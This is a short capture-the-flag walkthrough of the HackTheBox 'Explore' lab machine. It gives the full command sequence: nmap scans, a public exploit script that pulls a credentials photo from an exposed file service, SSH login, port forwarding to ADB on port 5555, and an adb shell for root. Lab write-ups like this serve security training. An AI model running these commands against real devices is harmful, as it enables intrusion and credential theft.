HackTheBox : Explore Walkthrough

First glance
Now let’s get acquainted with our site.

The site is not opening. Ok then let’s do a port scan
Step 1.
Command: nmap -p- -T4 10.10.10.247

Now let’s take a closer look at the open ports.
Command: nmap -sC -sV -p 2222,5555,36145,42135,59777 10.10.10.247

Step 2.
We see something different here, let’s investigate immediately and find the appropriate exploit.

I looked at the first site and found the appropriate exploit.

As you can see, it is running on port 59777. When we look at the files here, we see the contents. I know where the file is because I already solved it. But you can have a look if you want.
Let ‘s do it.
Step 3.
Command: python3 50070.py listPics 10.10.10.247

Now let’s download the photo we need and see.
Command: python3 50070.py getFile 10.10.10.247 *******************

Bingo. We found the username and password from the photo.
Step 4.
Now let’s connect with an open ssh port.
Command: ssh *****@10.10.10.247 -p 2222

Check the files, find user.txt and look inside

Findout the user flag and submit to htb.
Get root
We saw freeciv at port 5555. If you want to know more, you can do this by searching the Internet. Let’s use it
Download the adb tool first
Command: apt-get install adb
send a port connection to ssh.
Command: ssh -L 5555:localhost:5555 kristi@10.10.10.247 -p 2222
İs now ready to connect. Let’s start
Command: adb connect localhost:5555
Check the devices
Command: adb devices
Enter Shell
Command: adb -s localhost:5555 shell
And it’s ready. We have gained root power. Find the root.txt and send the root flag.

Get Roota and find the flag.
Findout the root flag and submit to htb.
Good h4cks)